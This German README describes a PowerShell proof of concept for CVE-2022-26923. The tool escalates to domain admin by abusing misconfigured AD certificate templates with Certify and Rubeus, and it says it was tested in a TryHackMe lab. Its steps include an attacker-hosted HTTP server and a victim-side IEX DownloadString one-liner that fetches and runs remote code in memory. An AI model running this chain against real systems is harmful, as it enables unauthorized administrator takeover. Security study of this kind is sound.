CVE-2022-26923-Powershell-POC
Ein PowerShell-PoC, um Certify und Rubeus aus dem Speicher zu laden und automatisch auszuführen.
Wie funktioniert es?
- Lädt Certify.exe und Rubeus.exe in den Speicher.
- Scannt das Zielgerät auf falsch konfigurierte Zertifikatsvorlagen. (Mehr unter https://www.youtube.com/watch?v=HBRCI5O35R8)
- Fordert ein Zertifikat für den administrativen Benutzer an, basierend auf der anfälligen Vorlage.
- Sendet das Zertifikat an den Zertifikatshandler, dieser übersetzt es in das .pfx-Format und sendet es zurück an den Client.
- Nutzt Rubeus, um das Zertifikat zu laden und ein Ticket für den administrativen Benutzer zu generieren.
- Ändert das Passwort des administrativen Benutzers. (Nur für die Demo)
Das PoC wurde in den folgenden TryHackMe-Labs getestet: https://tryhackme.com/room/adcertificatetemplates
Diese CVE wird zur Privilegienausweitung verwendet, daher wird in dieser Demo keine anfängliche Ausnutzung behandelt, noch das THM-Lab.
Schritte:
- python3 -m http.server 80 [Attacker Box]
- python3 uploader.py 8000 [Attacker Box]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Victim Box]
Hinweis: Dieses PoC dient nur zu Bildungszwecken. Sie sind für Ihre eigenen Handlungen verantwortlich.